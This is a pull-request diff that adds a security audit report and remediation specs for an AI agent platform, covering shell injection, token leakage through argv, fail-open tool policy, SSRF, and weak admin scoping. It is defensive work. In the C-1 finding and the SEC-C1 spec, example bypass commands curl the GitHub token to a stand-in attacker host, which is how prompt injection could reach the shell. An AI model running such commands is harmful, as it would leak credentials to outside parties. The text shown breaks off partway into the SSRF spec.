### PR TITLE
docs: security review — full-codebase audit (2026-04-23)

### DIFF
--- a/docs/security-reviews/2026-04-23-full-codebase-audit.md
+++ b/docs/security-reviews/2026-04-23-full-codebase-audit.md
@@ -1,0 +1,212 @@
+# Security Review — Full-Codebase Audit (2026-04-23)
+
+**Scope**: `src/stronghold/` (257 Python files, ~27k LOC) + `Dockerfile`, `docker-compose.yml`, `.gitleaks.toml`.
+**Method**: Parallel manual audit of auth, API routes, Warden/Sentinel/Gate, tool execution, and secrets/config surfaces; Bandit SAST; spot-verification of each finding against source.
+**Branch**: `claude/security-review-ehFhA` (no code changes in this review — this is a findings report only).
+
+Severity legend: **C**ritical / **H**igh / **M**edium / **L**ow / **I**nfo. "Verified" = I read the cited code and confirmed the behavior. "Noted" = plausible from the audit pass, not independently confirmed.
+
+---
+
+## Executive summary
+
+Three findings meet the bar for immediate attention:
+
+1. **C-1 Shell injection in `tools/shell_exec.py`** — `asyncio.create_subprocess_shell` combined with a prefix-only allowlist is trivially bypassable via `;`, `&&`, `|`, `` ` ``. Any agent holding the `code_gen` group can execute arbitrary shell.
+2. **C-2 GitHub token leaked through process args in `tools/workspace.py`** — the token is embedded in the `git clone` URL and passed as a positional argument to `subprocess.run`, making it visible to anything that can read `/proc/<pid>/cmdline` or `ps`.
+3. **H-1 Tool-policy fail-open on config error in `container.py`** — if `create_tool_policy()` raises (e.g., missing Casbin model/policy file), `tool_policy` becomes `None` and the enforcement gate at `container.py:407` is skipped entirely; all tool calls proceed without authorization.
+
+The rest are tractable hardening items. Overall the codebase shows mature defensive patterns: constant-time HMAC comparisons in webhooks, nonce + timestamp replay protection, regex ReDoS timeouts in Warden, Unicode NFKD normalization, an allowlist-then-interpolate pattern for dynamic SQL identifiers, and PyJWT with `audience`/`issuer` checks in the auth provider. The issues below are mostly gaps at integration points, not pervasive flaws.
+
+---
+
+## Critical
+
+### C-1 Shell injection in `tools/shell_exec.py` — **Verified**
+
+**File**: `src/stronghold/tools/shell_exec.py:155–174`
+
+The allowlist checks `cmd_lower.startswith(p)` against prefixes like `pytest`, `git `, `ls`. The blocklist is literal substring matching for patterns like `rm -rf /`. Execution then uses `asyncio.create_subprocess_shell(command, cwd=ws, …)`, which evaluates the string through `/bin/sh -c`.
+
+Example bypass — passes the allowlist (starts with `pytest`), does not match any blocked pattern, and exfiltrates the GitHub token:
+
+```
+pytest; curl -s https://attacker.example/$GITHUB_TOKEN
+```
+
+Other easy bypasses: `` `…` ``, `$(…)`, `|`, `&&`, and `>` redirection into `/workspace`.
+
+**Blast radius**: any agent in the `code_gen` tool group (wired globally in `container.py:362`). Per `agents/base.py:49`, Artificer/Mason are the primary users, but the tool is registered for any caller that meets the group filter. Combined with C-2, a single prompt injection in Mason can extract `GITHUB_TOKEN` / `LITELLM_MASTER_KEY` from the host environment.
+
+**Fix**: Switch to `asyncio.create_subprocess_exec(*shlex.split(command), …)`, resolve argv[0] against an explicit binary allowlist, and reject any command whose `shlex.split` raises or whose argv[0] isn't in the allowlist. Drop `_BLOCKED_PATTERNS` once the allowlist is structural — it's load-bearing today and trivial to bypass.
+
+Also pass a scrubbed `env=` to the subprocess instead of inheriting the parent env (which carries `GITHUB_TOKEN`, `LITELLM_MASTER_KEY`, `ROUTER_API_KEY`, etc.).
+
+### C-2 GitHub token leaked through process args in `tools/workspace.py` — **Verified**
+
+**File**: `src/stronghold/tools/workspace.py:112–119`
+
+```python
+token = os.environ.get("GITHUB_TOKEN", "")
+if token:
+    url = f"https://x-access-token:{token}@github.com/{owner}/{repo}.git"
+…
+self._run(["git", "clone", "--depth=1", url, str(repo_dir)])
+```
+
+The token is embedded in the URL argument to `subprocess.run`, which places it in `/proc/<pid>/cmdline` for the lifetime of the clone. It also lands in git's reflog and in any exception message that echoes argv (the `_run` helper at line 229 raises with the first three argv elements, so the URL isn't in the raised message — good — but the clone process itself is still observable).
+
+**Fix**: Use `GIT_ASKPASS` or a short-lived credential helper, or pipe the credential via `git -c credential.helper=…`. Never put secrets in argv.
+
+`owner` and `repo` are also unvalidated — a prompt-injected `owner="../../etc"` will still be rejected by git's URL parsing, but an attacker-controlled repo name like `evil-org/stronghold-fork` will clone successfully. Add an allowlist of permitted org/repo pairs.
+
+---
+
+## High
+
+### H-1 Tool-policy fail-open on config error — **Verified**
+
+**File**: `src/stronghold/container.py:323–329, 407–410`
+
+```python
+try:
+    tool_policy: ToolPolicyProtocol | None = create_tool_policy()
+except Exception:
+    logger.warning("Tool policy config not found, running without policy enforcement")
+    tool_policy = None
+…
+if tool_policy is not None and auth is not None:
+    …
+    if not tool_policy.check_tool_call(user_id, org_id, name):
+```
+
+The default paths `config/tool_policy_model.conf` and `config/tool_policy.csv` are loaded at startup. If either file is missing, Casbin raises, and the process continues without tool-call authorization. A single `WARNING` log line is the only indicator.
+
+**Fix**: Treat policy-load failure as fatal at startup unless an explicit env flag (`STRONGHOLD_DISABLE_TOOL_POLICY=1`) is set. Add a readiness-probe assertion that `container.tool_policy is not None` in production modes. Add a test: start the container with the policy files renamed and assert startup aborts.
+
+### H-2 Webhook accepts any `X-Webhook-Org` when `webhook_org_id` is unset — **Verified**
+
+**File**: `src/stronghold/api/routes/webhooks.py:108–129`
+
+Bearer-secret verification, timestamp window, and nonce dedupe are all correct and use `hmac.compare_digest`. However, when `config.webhook_org_id` is empty, the handler accepts whatever `X-Webhook-Org` the caller sends and only logs a warning. Any holder of the shared webhook secret can therefore impersonate any org.
+
+**Fix**: Require `webhook_org_id` to be set whenever the webhook endpoints are mounted; reject requests otherwise with a 503 (same pattern used when the secret is missing on line 60–62).
+
+### H-3 Admin role/user endpoints lack strict org scoping — **Noted**
+
+**File**: `src/stronghold/api/routes/admin.py:261–322, 399–424`
+
+Audit report flagged that `POST /admin/users/{user_id}/approve`, `/reject`, and `PUT /admin/users/{user_id}/roles` either accept arbitrary role strings or bypass org scoping when the caller has the system-admin role. The `roles` field is not validated against an enum.
+
+**Fix**: Enforce `org_id` in every WHERE clause on user-mutating admin queries unless the caller holds a distinct `superadmin` role; validate `roles` against a known set; require explicit `org_id` in the request body for system-admin cross-org operations (audit-logged).
+
+### H-4 MCP server deployment lacks admin check — **Noted**
+
+**File**: `src/stronghold/api/routes/mcp.py` (deploy endpoint)
+
+Audit report indicates that the MCP "deploy server" endpoint authenticates the caller but does not check for the `admin` role before deploying an attacker-supplied Docker image to the K8s cluster. Verify and gate with a role check.
+
+### H-5 SSRF surface in `/agents/import-url` — **Noted**
+
+**File**: `src/stronghold/api/routes/agents.py:370–461`
+
+The private-IP check (`is_private | is_loopback | is_link_local | is_reserved`) runs once at URL-parse time. DNS rebinding (re-resolve with a short TTL between the check and the fetch) can redirect to internal IPs. `follow_redirects=False` blocks HTTP-level redirects but not DNS-level.
+
+**Fix**: Re-resolve the hostname at connect time and assert the resolved IP is still public — or use an HTTP client that lets you pin the connect IP after the check. At minimum, set a hard timeout and maximum response size on the fetch.
+
+### H-6 Tool results bypass Sentinel when it's not configured — **Noted**
+
+**File**: `src/stronghold/agents/strategies/react.py` (fallback path after `sentinel.post_call`)
+
+Report indicates that when `sentinel` is None, the React strategy falls back to a direct Warden scan that misses PII redaction and structured audit logging. Also flagged that `triggers.py` and `skills.py` invoke Warden directly without going through Sentinel. Verify and consolidate on a single post-call code path.
+
+---
+
+## Medium
+
+### M-1 Warden Layer 3 fails open on LLM error — **Verified, documented**
+
+**File**: `src/stronghold/security/warden/llm_classifier.py:148–159`, `security/warden/detector.py:143–144`
+
+The L3 LLM classifier returns `{"label": "safe", …}` on any exception, and the detector's own try/except swallows failures and falls through to `return WardenVerdict(clean=True)`. This is explicitly documented ("fail-open for availability") and only affects tool-result scanning when L1 regex + L2 heuristics + L2.5 semantic have all passed; it is not a blanket bypass. Still, a sophisticated payload that only the LLM layer catches will slip through during provider outages.
+
+**Recommendation**: Make the fail-open policy configurable. For tenants with strict tool-result hygiene requirements, default to fail-closed (`clean=False, blocked=True, flags=("l3_unavailable",)`).
+
+### M-2 Demo-cookie middleware doesn't verify JWT `issuer` — **Verified**
+
+**File**: `src/stronghold/api/middleware/demo_cookie.py:74–79` vs. `security/auth_demo_cookie.py:73–80`
+
+The middleware's pre-check decodes with `audience="stronghold"` only; the provider in the composite chain additionally validates `issuer="stronghold-demo"`. The inconsistency is defense-in-depth overlap rather than a bypass (the provider re-checks), but it weakens the middleware's pre-injection filter.
+
+**Fix**: Add `issuer="stronghold-demo"` to the middleware decode.
+
+### M-3 PBKDF2 iteration count below current NIST guidance — **Noted**
+
+**File**: `src/stronghold/security/auth_jwt.py` (or wherever legacy PBKDF2 verify lives; audit cited line 232)
+
+Uses 600,000 iterations. SP 800-63B (2024) recommends ≥ 1,000,000 for PBKDF2-HMAC-SHA256. Low immediate risk; bump on next rotation and add a re-hash-on-login path.
+
+### M-4 Dockerfile: `chmod 777 /workspace`, runs as root — **Verified**
+
+**File**: `Dockerfile:34`, no `USER` directive
+
+`/workspace` is world-writable and the container runs as root. In K8s the `securityContext` can override, but the image itself sets a bad baseline.
+
+**Fix**: `RUN useradd -r -u 1000 stronghold && mkdir -p /workspace && chown stronghold:stronghold /workspace && chmod 750 /workspace` + `USER stronghold`.
+
+### M-5 docker-compose: hardcoded `postgres:stronghold/stronghold`, Redis has no AUTH — **Verified**
+
+**File**: `docker-compose.yml:40–42`
+
+Dev defaults only, but the header comment (`cp .env.example .env && edit .env && docker compose up -d`) doesn't actually cause the compose file to pick up a `.env` override for Postgres — the `environment:` block hardcodes them. Redis isn't in compose today, but cache code supports it; ensure any added Redis service requires `requirepass`.
+
+**Fix**: Parameterize via `${POSTGRES_PASSWORD}` with no default, and fail fast if unset.
+
+### M-6 Tracing spans aren't scrubbed before export — **Noted**
+
+**File**: `src/stronghold/tracing/phoenix_backend.py:52–58`
+
+Reports `span.set_attribute("input", str(data)[:1000])` without redaction. LLM inputs frequently carry secrets (pasted tokens, API keys in troubleshooting threads) or PII. For Arize Phoenix exports, add a redaction pass (regex for `sk-[a-zA-Z0-9]{20,}`, `ey[A-Za-z0-9_-]+\.`, email addresses) before `set_attribute`.
+
+### M-7 Task policy defaults unknown priority tiers to allow — **Noted**
+
+**File**: `src/stronghold/security/task_policy.py:101–103`
+
+Reported: `if not limits: return True`. An unknown/typo'd tier skips budget enforcement. Fix: unknown tier → deny, and log loudly.
+
+---
+
+## Low
+
+- **L-1** Path-traversal check in `tools/file_ops.py:60–62` uses `str(target).startswith(str(ws.resolve()))`. Symlink escape and case-insensitive-FS pitfalls. Prefer `target.resolve().is_relative_to(ws.resolve())` with an exception handler.
+- **L-2** Skill-scan regex (`parser.py:55–79`) catches literal `exec`/`eval`/`importlib` but not `__import__`, `globals()['__builtins__']`, or `getattr(builtins, 'exec')`. Static AST analysis is more robust than regex.
+- **L-3** `auth_composite.py:43` swallows `Exception` from each provider. If a provider raises for a non-auth reason (network glitch, bug), it's treated the same as "wrong credentials" and the next provider tries. This is intentional fail-through but means bugs in early providers are silent. Log provider name + exception class at DEBUG.
+- **L-4** `.gitleaks.toml` allowlist regex `sk-example-[a-zA-Z0-9-]+` would also permit a real secret that happened to be pasted with an `sk-example-` prefix. Tighten to `sk-example-[a-z0-9]{1,16}$` or similar.
+- **L-5** Forged skills are pinned to trust tier `t3` (`forge.py:141–152`), but there is no runtime *capability* restriction that prevents a `t3` skill from calling `shell_exec`. Tier is an attribute, not a gate. Add a tier→tool-group allowlist and enforce at `tool_dispatcher`.
+- **L-6** `pg_outcomes.py` and `api/routes/profile.py` both interpolate column names via f-strings after an allowlist check. The allowlists are correct today and Bandit's B608 flag is a false positive, but the pattern is fragile — add a unit test that asserts rejected identifiers raise and review on every schema change.
+- **L-7** Demo-cookie auth uses `ROUTER_API_KEY` as its HS256 signing key (`auth_demo_cookie.py:34–40`). If the router key is ever leaked or short, an attacker can mint arbitrary demo sessions with any claims. Enforce a minimum key length of 32 bytes at *startup*, not just a runtime warning.
+
+---
+
+## Info / not findings
+
+- **Composite auth is fail-closed**, not fail-open. `CompositeAuthProvider.authenticate` raises `ValueError("Authentication failed")` after all providers fail (`auth_composite.py:49–51`). One audit pass claimed otherwise; that claim doesn't hold up.
+- **`DemoCookieAuthProvider` does verify `issuer`** (`auth_demo_cookie.py:79`). Only the middleware pre-check doesn't (see M-2).
+- **Webhook signature uses `hmac.compare_digest`** (`webhooks.py:70`) — constant-time, correct.
+- **Warden L1 regex runs with a per-pattern timeout** via the `regex` library (`detector.py:30, 73`) — ReDoS-mitigated.
+- **Bandit**: 0 HIGH, 3 MEDIUM (all false positives — string-built SQL with strict allowlist on identifiers), 24 LOW. The MEDIUM hits are annotated with `# noqa: S608` and guarded by set-membership checks. No hardcoded real secrets.
+
+---
+
+## Recommended next actions (in order)
+
+1. Patch `shell_exec.py` to use `create_subprocess_exec` + structural argv allowlist + scrubbed env (C-1).
+2. Remove the token from `git clone` argv; use `GIT_ASKPASS` (C-2).
+3. Make tool-policy load failure fatal by default (H-1).
+4. Require `webhook_org_id` at mount time (H-2).
+5. Verify & fix H-3 through H-6 against source; they were flagged by the parallel audit pass but not independently verified in this review.
+6. Schedule follow-ups for M-1 (configurable L3 fail policy) and M-6 (tracing redaction) — these require design decisions, not one-line fixes.
+
+---
+
+*Review generated 2026-04-23. See `ARCHITECTURE.md §3.6` for the phase-gated security-review checkpoints; this is an ad-hoc full-codebase pass, not a release gate.*

--- a/docs/security-reviews/specs/README.md
+++ b/docs/security-reviews/specs/README.md
@@ -1,0 +1,36 @@
+# Security-Review Remediation Specs (2026-04-23)
+
+One spec per finding from [`../2026-04-23-full-codebase-audit.md`]. Each
+spec has a user story, acceptance criteria, test mapping, files to touch,
+and a rollback note.
+
+## Order of work
+
+Ship in this sequence (each row is a single PR):
+
+| # | Spec | Severity | Why this order |
+|---|------|----------|----------------|
+| 1 | [sec-c1-shell-injection](sec-c1-shell-injection.md)        | Critical | Highest blast radius; blocks #2. |
+| 2 | [sec-c2-github-token-argv](sec-c2-github-token-argv.md)    | Critical | Needs #1's env-scrubbing machinery. |
+| 3 | [sec-h1-tool-policy-fail-open](sec-h1-tool-policy-fail-open.md) | High | Misconfiguration becomes fatal; unblocks tighter policy work. |
+| 4 | [sec-h2-webhook-org-spoof](sec-h2-webhook-org-spoof.md)    | High | One-file change; low risk. |
+| 5 | [sec-h4-mcp-deploy-admin](sec-h4-mcp-deploy-admin.md)      | High | Independent; ship anytime. |
+| 6 | [sec-h3-admin-authz](sec-h3-admin-authz.md)                | High | Touches many admin handlers; do after #3/#4/#5 to amortize review. |
+| 7 | [sec-h5-ssrf-dns-rebinding](sec-h5-ssrf-dns-rebinding.md)  | High | Needs design decision on HTTP client; feature-flag. |
+| 8 | [sec-h6-sentinel-fallback](sec-h6-sentinel-fallback.md)    | High | Refactor; do after Criticals land. |
+| 9 | [sec-m2-demo-cookie-issuer](sec-m2-demo-cookie-issuer.md)  | Medium | Trivial; pair with #4. |
+| 10 | [sec-m4-dockerfile-nonroot](sec-m4-dockerfile-nonroot.md) | Medium | Deploy-path; coordinate with Helm chart owner. |
+| 11 | [sec-m5-compose-password](sec-m5-compose-password.md)     | Medium | Dev-ergonomics; docs update. |
+
+## Convention
+
+These follow [`../../specs/CONVENTIONS.md`](../../specs/CONVENTIONS.md)
+with two relaxations:
+
+- No `Evidence References` section (findings are first-party, not drawn from external research).
+- No `Open Questions` section unless there is a genuine design question (see #7).
+
+## Not specced here
+
+Low-severity items L-1 through L-7 from the review are left as TODO
+comments in a follow-up sweep. They are hardening, not remediation.

--- a/docs/security-reviews/specs/sec-c1-shell-injection.md
+++ b/docs/security-reviews/specs/sec-c1-shell-injection.md
@@ -1,0 +1,43 @@
+# SEC-C1: Shell injection in `tools/shell_exec.py`
+
+## User Story
+
+As a **security auditor**, I want `ShellExecutor` to reject every shell
+metacharacter, so that an agent with `code_gen` access cannot execute
+arbitrary commands via prompt injection.
+
+## Background
+
+`src/stronghold/tools/shell_exec.py:155–174` uses
+`asyncio.create_subprocess_shell` with a `startswith` prefix allowlist. A
+command like `pytest; curl https://attacker/$GITHUB_TOKEN` passes the
+allowlist and is then evaluated by `/bin/sh -c`. Subprocess also inherits
+the parent env, which carries `GITHUB_TOKEN`, `LITELLM_MASTER_KEY`,
+`ROUTER_API_KEY`.
+
+## Acceptance Criteria
+
+- AC1: Given a command containing `;`, `&&`, `||`, `|`, `` ` ``, `$(`, `>`, `<`, or newline, When `ShellExecutor.execute` runs, Then it returns `success=False` with `error="command not allowed"`.
+- AC2: Given a command whose `shlex.split` argv[0] is not in the binary allowlist, When executed, Then it returns `success=False`.
+- AC3: Given an allowed command, When executed, Then subprocess is spawned via `create_subprocess_exec` (no shell) with `env=` scrubbed of `GITHUB_TOKEN`, `LITELLM_MASTER_KEY`, `ROUTER_API_KEY`, `OPENAI_API_KEY`, `ANTHROPIC_API_KEY`.
+- AC4: Given the scrubbed env, When `git` runs, Then `PATH`, `HOME`, `LANG`, and `GIT_ASKPASS` (if set) are preserved so quality gates still work.
+- AC5: Given `shlex.split` raises (unterminated quote), When executed, Then it returns `success=False` without invoking subprocess.
+
+## Test Mapping
+
+| AC  | Test path                                     | Test function                                   | Tier     |
+|-----|-----------------------------------------------|-------------------------------------------------|----------|
+| AC1 | tests/tools/test_shell_exec.py                | test_rejects_shell_metacharacters               | critical |
+| AC2 | tests/tools/test_shell_exec.py                | test_rejects_unknown_binary                     | critical |
+| AC3 | tests/tools/test_shell_exec.py                | test_env_scrubbed_of_secrets                    | critical |
+| AC4 | tests/tools/test_shell_exec.py                | test_env_preserves_path_and_home                | happy    |
+| AC5 | tests/tools/test_shell_exec.py                | test_shlex_error_rejected                       | critical |
+
+## Files to Touch
+
+- Modify: `src/stronghold/tools/shell_exec.py` — replace `create_subprocess_shell` with `create_subprocess_exec`; add `_BINARY_ALLOWLIST` (set); add `_scrubbed_env()`; drop `_BLOCKED_PATTERNS`.
+- New: `tests/tools/test_shell_exec.py` (if absent) — ACs above.
+
+## Rollback
+
+Single-file change; revert the commit. Quality gates (`run_pytest`, etc.) already pass workspaces via argv, so the `exec` form is drop-in.

--- a/docs/security-reviews/specs/sec-c2-github-token-argv.md
+++ b/docs/security-reviews/specs/sec-c2-github-token-argv.md
@@ -1,0 +1,50 @@
+# SEC-C2: `GITHUB_TOKEN` leaked through subprocess argv
+
+## User Story
+
+As a **platform operator**, I want the GitHub token kept out of process
+argv, so that `/proc/<pid>/cmdline`, `ps`, and container log exporters
+cannot capture it.
+
+## Background
+
+`src/stronghold/tools/workspace.py:112–119` embeds the token directly in
+the clone URL:
+
+```python
+url = f"https://x-access-token:{token}@github.com/{owner}/{repo}.git"
+self._run(["git", "clone", "--depth=1", url, str(repo_dir)])
+```
+
+`subprocess.run` places the full URL in argv, visible to anything with
+`ptrace_scope=0` or that reads `/proc`. Also, `owner` / `repo` are
+unvalidated — an attacker-chosen `owner/repo` clones anywhere on github.
+
+## Acceptance Criteria
+
+- AC1: Given a `GITHUB_TOKEN`, When `_ensure_clone` runs, Then argv to `git clone` does not contain the token (use `GIT_ASKPASS` or `git -c credential.helper=…` via stdin).
+- AC2: Given a clone operation, When `ps -o args` is observed during execution, Then the URL shown is `https://github.com/<owner>/<repo>.git` (no credential).
+- AC3: Given `owner` not in the configured allowlist, When `_ensure_clone` runs, Then it raises `ValueError("owner not in allowlist")` before subprocess invocation.
+- AC4: Given `GITHUB_OWNERS_ALLOWLIST` is unset, When `_ensure_clone` runs, Then it defaults to a single-element list derived from `config.github.owner` (fail-closed on absence).
+- AC5: Given the credential helper script, When invoked, Then it reads the token from an env var passed only to the git subprocess (not the parent env).
+
+## Test Mapping
+
+| AC  | Test path                                 | Test function                              | Tier     |
+|-----|-------------------------------------------|--------------------------------------------|----------|
+| AC1 | tests/tools/test_workspace.py             | test_clone_argv_has_no_token               | critical |
+| AC2 | tests/tools/test_workspace.py             | test_clone_uses_askpass_env                | critical |
+| AC3 | tests/tools/test_workspace.py             | test_owner_not_in_allowlist_raises         | critical |
+| AC4 | tests/tools/test_workspace.py             | test_empty_allowlist_is_fail_closed        | critical |
+| AC5 | tests/tools/test_workspace.py             | test_askpass_env_isolated_from_parent      | happy    |
+
+## Files to Touch
+
+- Modify: `src/stronghold/tools/workspace.py` — replace URL-embedded token with `GIT_ASKPASS` helper; add owner/repo allowlist check.
+- New: `scripts/git-askpass-stronghold.sh` — reads token from `STRONGHOLD_GH_TOKEN` env only.
+- Modify: `src/stronghold/types/config.py` — add `github.owners_allowlist: list[str]`.
+- New: `tests/tools/test_workspace.py` — ACs above, using a fake `_run` that captures argv+env.
+
+## Rollback
+
+Single-commit revert. `git-askpass` is widely supported; no external deps.

--- a/docs/security-reviews/specs/sec-h1-tool-policy-fail-open.md
+++ b/docs/security-reviews/specs/sec-h1-tool-policy-fail-open.md
@@ -1,0 +1,45 @@
+# SEC-H1: Tool-policy load failure must be fatal
+
+## User Story
+
+As a **security auditor**, I want a missing or broken Casbin policy file
+to abort startup, so that tool-call authorization cannot be silently
+disabled.
+
+## Background
+
+`src/stronghold/container.py:323–329` catches any exception from
+`create_tool_policy()` and sets `tool_policy = None`. The dispatch gate at
+line 407 (`if tool_policy is not None and auth is not None:`) is then
+skipped, and every tool call proceeds unauthorized. The failure is visible
+only as a single `WARNING` log line.
+
+## Acceptance Criteria
+
+- AC1: Given the policy model or CSV file is missing, When the container builds, Then startup raises `ConfigError("tool policy load failed")` unless `STRONGHOLD_DISABLE_TOOL_POLICY=1`.
+- AC2: Given `STRONGHOLD_DISABLE_TOOL_POLICY=1` is set, When the container builds, Then startup logs `CRITICAL: tool policy disabled via override` and continues.
+- AC3: Given an empty but syntactically valid policy CSV, When a tool call is dispatched, Then the call is denied (default-deny), not allowed.
+- AC4: Given a readiness probe call, When `tool_policy` is `None` and the override is not set, Then the `/readyz` endpoint returns 503.
+- AC5: Given a test suite, When integration tests run with the override set, Then they must pass without the override so CI catches accidental disabling.
+
+## Test Mapping
+
+| AC  | Test path                                         | Test function                                | Tier     |
+|-----|---------------------------------------------------|----------------------------------------------|----------|
+| AC1 | tests/security/test_tool_policy_wiring.py         | test_missing_policy_file_aborts_startup      | critical |
+| AC2 | tests/security/test_tool_policy_wiring.py         | test_override_allows_startup_with_critical   | critical |
+| AC3 | tests/security/test_tool_policy.py                | test_empty_policy_denies_tool_call           | critical |
+| AC4 | tests/api/test_health.py                          | test_readyz_503_when_policy_missing          | critical |
+| AC5 | tests/security/test_tool_policy_wiring.py         | test_ci_does_not_set_override                | happy    |
+
+## Files to Touch
+
+- Modify: `src/stronghold/container.py` — replace `tool_policy = None` fallback with a `ConfigError` unless override env is set; log CRITICAL on override.
+- Modify: `src/stronghold/security/tool_policy.py` — confirm Casbin model is `!some(where (p.eft == allow))` or equivalent default-deny; document the model file.
+- Modify: `src/stronghold/api/routes/status.py` (or wherever `/readyz` lives) — assert `container.tool_policy is not None or override_set`.
+- New: `tests/security/test_tool_policy_wiring.py`.
+
+## Rollback
+
+Revert the container.py change. The override flag exists so operators can
+re-enable the old fail-open behavior in emergencies without a code change.

--- a/docs/security-reviews/specs/sec-h2-webhook-org-spoof.md
+++ b/docs/security-reviews/specs/sec-h2-webhook-org-spoof.md
@@ -1,0 +1,41 @@
+# SEC-H2: Require `webhook_org_id` when webhooks are mounted
+
+## User Story
+
+As a **tenant admin**, I want webhook endpoints rejected at startup if no
+`webhook_org_id` is configured, so that a shared webhook secret cannot be
+used to impersonate any org via the `X-Webhook-Org` header.
+
+## Background
+
+`src/stronghold/api/routes/webhooks.py:108–129` logs a warning and then
+accepts whatever `X-Webhook-Org` the caller sends when
+`config.webhook_org_id` is empty. Any holder of the bearer secret can
+therefore act as any org. The bearer + timestamp + nonce checks
+themselves are correct.
+
+## Acceptance Criteria
+
+- AC1: Given `STRONGHOLD_WEBHOOK_SECRET` is set and `webhook_org_id` is empty, When the app starts, Then startup fails with `ConfigError("webhook_org_id required when webhook endpoints enabled")`.
+- AC2: Given both are set, When a webhook request arrives with a matching `X-Webhook-Org`, Then it is accepted as today.
+- AC3: Given both are set, When a webhook request arrives with a mismatched `X-Webhook-Org`, Then it is rejected with 403.
+- AC4: Given `STRONGHOLD_WEBHOOK_SECRET` is unset, When the app starts, Then webhook routes are not mounted at all (current behavior, preserved).
+
+## Test Mapping
+
+| AC  | Test path                                     | Test function                                  | Tier     |
+|-----|-----------------------------------------------|------------------------------------------------|----------|
+| AC1 | tests/api/test_webhooks.py                    | test_startup_fails_without_webhook_org_id      | critical |
+| AC2 | tests/api/test_webhooks.py                    | test_matching_org_accepted                     | happy    |
+| AC3 | tests/api/test_webhooks.py                    | test_mismatched_org_rejected_403               | critical |
+| AC4 | tests/api/test_webhooks.py                    | test_webhook_routes_not_mounted_without_secret | happy    |
+
+## Files to Touch
+
+- Modify: `src/stronghold/api/routes/webhooks.py` — remove the "no expected org" fallback; require `webhook_org_id` unconditionally.
+- Modify: `src/stronghold/api/app.py` (or the router-registration site) — assert `config.webhook_org_id` when registering webhook router.
+- Modify: `src/stronghold/config/loader.py` — validate the pair `(webhook_secret, webhook_org_id)` must both be set or both empty.
+
+## Rollback
+
+Single-commit revert. Existing deployments that already set both values are unaffected.

--- a/docs/security-reviews/specs/sec-h3-admin-authz.md
+++ b/docs/security-reviews/specs/sec-h3-admin-authz.md
@@ -1,0 +1,43 @@
+# SEC-H3: Org-scoped admin mutations + role allowlist
+
+## User Story
+
+As a **tenant admin**, I want admin mutations on users to be org-scoped
+by default and the role field to be validated against a known enum, so
+that a non-system admin cannot escalate users in another tenant and no
+admin can assign arbitrary role strings.
+
+## Background
+
+`src/stronghold/api/routes/admin.py:261–322, 399–424` implements
+`/admin/users/{user_id}/approve`, `/reject`, and `PUT
+/admin/users/{user_id}/roles`. Non-system admins rely on an `org_id`
+filter that is not applied uniformly; `roles` is only validated as a
+`list[str]`, with no allowlist against the project's role enum.
+
+## Acceptance Criteria
+
+- AC1: Given a non-system admin calls approve/reject/update-roles with a `user_id` that belongs to a different org, When the handler runs, Then it returns 404 (not 403 — no existence disclosure).
+- AC2: Given `roles` contains any value not in `ALLOWED_ROLES = {"user", "team_admin", "org_admin", "admin"}`, When the handler runs, Then it returns 400 with `detail="invalid role"`.
+- AC3: Given a system admin calls a cross-org mutation, When the handler runs, Then the request body MUST include `org_id` and an audit log entry is written with `actor`, `target_user`, `target_org`, `roles_before`, `roles_after`.
+- AC4: Given an approve/reject/update-roles handler, When the database UPDATE runs, Then the WHERE clause includes `org_id = $N` for every path except the explicit system-admin cross-org path.
+
+## Test Mapping
+
+| AC  | Test path                                    | Test function                                | Tier     |
+|-----|----------------------------------------------|----------------------------------------------|----------|
+| AC1 | tests/api/test_admin_authz.py                | test_cross_org_mutation_returns_404          | critical |
+| AC2 | tests/api/test_admin_authz.py                | test_unknown_role_rejected_400               | critical |
+| AC3 | tests/api/test_admin_authz.py                | test_system_admin_cross_org_audited          | critical |
+| AC4 | tests/api/test_admin_authz.py                | test_org_scoped_update_query_filter          | happy    |
+
+## Files to Touch
+
+- Modify: `src/stronghold/api/routes/admin.py` — add `_ALLOWED_ROLES` constant; add `org_id` WHERE clause to every user-mutation query; require `org_id` body field on system-admin cross-org path; add audit-log call.
+- New: `tests/api/test_admin_authz.py`.
+- Use: existing `PgAudit` helper.
+
+## Rollback
+
+Per-endpoint commits so each handler can be reverted independently. The
+role allowlist is additive; existing callers passing valid roles are unaffected.

--- a/docs/security-reviews/specs/sec-h4-mcp-deploy-admin.md
+++ b/docs/security-reviews/specs/sec-h4-mcp-deploy-admin.md
@@ -1,0 +1,40 @@
+# SEC-H4: MCP server deploy requires `admin` role
+
+## User Story
+
+As a **platform operator**, I want MCP server deployment gated by the
+`admin` role, so that any authenticated user cannot ship an arbitrary
+Docker image into the shared K8s cluster.
+
+## Background
+
+`src/stronghold/api/routes/mcp.py` (deploy endpoint, ~line 152 onward)
+authenticates the caller but does not verify role. `image` is taken from
+the request body, meaning any authenticated user can deploy an
+attacker-supplied container.
+
+## Acceptance Criteria
+
+- AC1: Given a caller without `admin` role, When they POST to the deploy endpoint, Then it returns 403.
+- AC2: Given a caller with `admin` role, When they POST with a valid body, Then the deployment proceeds as today.
+- AC3: Given `image` is provided, When validated, Then it must match `^[a-z0-9.\-/]+:[a-zA-Z0-9._\-]+$` AND the registry prefix must be in `MCP_IMAGE_REGISTRY_ALLOWLIST` (e.g., `ghcr.io/<org>/`, `<acr>.azurecr.io/`); otherwise 400.
+- AC4: Given a successful deploy, When the audit log is written, Then it includes `actor`, `image`, `namespace`, and `scope`.
+
+## Test Mapping
+
+| AC  | Test path                              | Test function                              | Tier     |
+|-----|----------------------------------------|--------------------------------------------|----------|
+| AC1 | tests/api/test_mcp_deploy.py           | test_non_admin_cannot_deploy               | critical |
+| AC2 | tests/api/test_mcp_deploy.py           | test_admin_can_deploy                      | happy    |
+| AC3 | tests/api/test_mcp_deploy.py           | test_image_outside_allowlist_rejected      | critical |
+| AC4 | tests/api/test_mcp_deploy.py           | test_deploy_is_audit_logged                | happy    |
+
+## Files to Touch
+
+- Modify: `src/stronghold/api/routes/mcp.py` — add `if "admin" not in auth.roles: raise HTTPException(403)`; add image-registry allowlist check; call audit log.
+- Modify: `src/stronghold/types/config.py` — add `mcp.image_registry_allowlist: list[str]`.
+- New: `tests/api/test_mcp_deploy.py`.
+
+## Rollback
+
+Single-commit revert. No data migration.

--- a/docs/security-reviews/specs/sec-h5-ssrf-dns-rebinding.md
+++ b/docs/security-reviews/specs/sec-h5-ssrf-dns-rebinding.md
@@ -1,0 +1,43 @@
+# SEC-H5: Close DNS-rebinding gap in `/agents/import-url`
+
+## User Story
+
+As a **security auditor**, I want URL-import fetches to reject internal
